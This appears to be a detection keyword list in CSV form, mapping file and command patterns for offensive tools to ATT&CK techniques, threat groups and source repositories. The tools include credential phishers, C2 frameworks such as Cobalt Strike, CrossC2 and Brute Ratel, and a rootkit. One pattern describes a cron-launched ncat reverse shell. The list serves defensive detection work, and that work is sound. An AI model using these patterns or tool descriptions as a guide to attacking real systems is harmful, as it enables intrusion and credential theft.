+"*CredPhisher.csproj*","offensive_tool_keyword","CredPhisher","Prompts the current user for their credentials using the CredUIPromptForWindowsCredentials WinAPI function","T1056.002 - T1111","TA0004 ","N/A","N/A","Phishing","https://github.com/matterpreter/OffensiveCSharp/tree/master/CredPhisher","1","1","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*CredPhisher.exe*","offensive_tool_keyword","CredPhisher","Prompts the current user for their credentials using the CredUIPromptForWindowsCredentials WinAPI function","T1056.002 - T1111","TA0004 ","N/A","N/A","Phishing","https://github.com/matterpreter/OffensiveCSharp/tree/master/CredPhisher","1","1","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*credphisher.py*","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","10","2070","413","2023-07-08T19:10:18Z","2018-09-25T15:17:30Z" +"*cred-popper *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*CredPrompt/CredPrompt.cna*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/guervild/BOFs","1","1","N/A","10","10","154","27","2022-05-02T16:59:24Z","2021-03-15T23:30:22Z" +"*creds_hunt.exe*","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Metro-Holografix/DInjector","1","1","private github repo","10",,"N/A",,, +"*CredsLeaker*","offensive_tool_keyword","CredsLeaker","This script used to display a powershell credentials box asked the user for credentials. However. That was highly noticeable. Now its time to utilize Windows Security popup!","T1087 - T1056 - T1003 - T1059 - T1110","TA0003 - TA0006","N/A","N/A","Credential Access","https://github.com/Dviros/CredsLeaker","1","1","N/A","N/A","3","295","73","2021-03-31T11:49:57Z","2018-03-05T07:53:31Z" +"*CredsPhish.ps1*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" +"*Credz-Plz.ps1*","offensive_tool_keyword","OMG-Credz-Plz","A script used to prompt the target to enter their creds to later be exfiltrated with dropbox.","T1056.002 - T1566.001 - T1567.002","TA0004 - TA0040 - TA0010","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/-OMG-Credz-Plz","1","1","N/A","10","6","544","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" +"*Credz-Plz-Execute.txt*","offensive_tool_keyword","OMG-Credz-Plz","A script used to prompt the target to enter their creds to later be exfiltrated with dropbox.","T1056.002 - T1566.001 - T1567.002","TA0004 - TA0040 - TA0010","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/-OMG-Credz-Plz","1","1","N/A","10","6","544","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" +"*cribdragg3r/Alaris*","offensive_tool_keyword","cobaltstrike","A protective and Low Level Shellcode Loader that defeats modern EDR systems.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/cribdragg3r/Alaris","1","1","N/A","10","10","846","136","2021-11-01T05:00:43Z","2020-02-22T15:42:37Z" +"*crimeware*/zeus.profile*","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","10","10","1362","429","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z" +"*crisis_monitor start*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*crisis_monitor stop*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*crisprss/PrintSpoofer*","offensive_tool_keyword","cobaltstrike","Reflection dll implementation of PrintSpoofer used in conjunction with Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/crisprss/PrintSpoofer","1","1","N/A","10","10","76","8","2021-10-07T17:45:00Z","2021-10-07T17:28:45Z" +"*crk_get_key1*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*crk_get_key2*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*crk_max_keys_per_crypt*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*crk_methods.*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*crk_password_loop*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*Cronos Rootkit.*","offensive_tool_keyword","Cronos-Rootkit","Cronos is Windows 10/11 x64 ring 0 rootkit. Cronos is able to hide processes. protect and elevate them with token manipulation.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/XaFF-XaFF/Cronos-Rootkit","1","0","N/A","N/A","8","744","176","2022-03-29T08:26:03Z","2021-08-25T08:54:45Z" +"*CronosDebugger.*","offensive_tool_keyword","Cronos-Rootkit","Cronos is Windows 10/11 x64 ring 0 rootkit. Cronos is able to hide processes. protect and elevate them with token manipulation.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/XaFF-XaFF/Cronos-Rootkit","1","1","N/A","N/A","8","744","176","2022-03-29T08:26:03Z","2021-08-25T08:54:45Z" +"*CronosRootkit.*","offensive_tool_keyword","Cronos-Rootkit","Cronos is Windows 10/11 x64 ring 0 rootkit. Cronos is able to hide processes. protect and elevate them with token manipulation.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/XaFF-XaFF/Cronos-Rootkit","1","1","N/A","N/A","8","744","176","2022-03-29T08:26:03Z","2021-08-25T08:54:45Z" +"*crontab* sleep *ncat * -e /bin/bash*crontab*","greyware_tool_keyword","crontab","linux commands abused by attackers","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","POST Exploitation tools","N/A","1","0","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" +"*crop.exe \\*\*.lnk \\*\harvest \\*\harvest*","offensive_tool_keyword","Farmer","Farmer is a project for collecting NetNTLM hashes in a Windows domain. Farmer achieves this by creating a local WebDAV server that causes the WebDAV Mini Redirector to authenticate from any connecting clients.","T1557.001 - T1056.004 - T1078.003","TA0006 - TA0004 - TA0001","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/mdsecactivebreach/Farmer","1","0","N/A","10","4","308","49","2021-04-28T15:27:24Z","2021-02-22T14:32:29Z" +"*CrossC2 beacon*","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z" +"*crossc2 dyn load*","offensive_tool_keyword","crossc2","generate CobaltStrike's cross-platform payload","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/gloxec/CrossC2","1","0","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z" +"*CrossC2 framework*","offensive_tool_keyword","crossc2","generate CobaltStrike's cross-platform payload","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z" +"*CrossC2.cna*","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z" +"*CrossC2.cna*","offensive_tool_keyword","crossc2","generate CobaltStrike's cross-platform payload","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z" +"*CrossC2.git*","offensive_tool_keyword","crossc2","generate CobaltStrike's cross-platform payload","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z" +"*CrossC2.Linux*","offensive_tool_keyword","crossc2","generate CobaltStrike's cross-platform payload","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z" +"*CrossC2.MacOS*","offensive_tool_keyword","crossc2","generate CobaltStrike's cross-platform payload","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z" +"*CrossC2.Win*","offensive_tool_keyword","crossc2","generate CobaltStrike's cross-platform payload","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z" +"*CrossC2_dev_*","offensive_tool_keyword","crossc2","generate CobaltStrike's cross-platform payload","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z" +"*crossc2_entry*","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z" +"*crossc2_portscan.*","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Adminisme/ServerScan","1","1","N/A","10","10","1430","218","2022-06-28T08:27:39Z","2020-04-03T15:14:12Z" +"*crossc2_serverscan.*","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Adminisme/ServerScan","1","1","N/A","10","10","1430","218","2022-06-28T08:27:39Z","2020-04-03T15:14:12Z" +"*CrossC2Beacon*","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z" +"*CrossC2-cs*","offensive_tool_keyword","crossc2","generate CobaltStrike's cross-platform payload","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z" +"*CrossC2-GithubBot*","offensive_tool_keyword","crossc2","generate CobaltStrike's cross-platform payload","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z" +"*CrossC2Kit","offensive_tool_keyword","crossc2","generate CobaltStrike's cross-platform payload","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z" +"*CrossC2Kit.*","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Adminisme/ServerScan","1","1","N/A","10","10","1430","218","2022-06-28T08:27:39Z","2020-04-03T15:14:12Z" +"*CrossC2Kit.*","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CrossC2/CrossC2Kit","1","1","N/A","10","10","155","25","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z" +"*CrossC2Kit.git*","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. thereby extending the 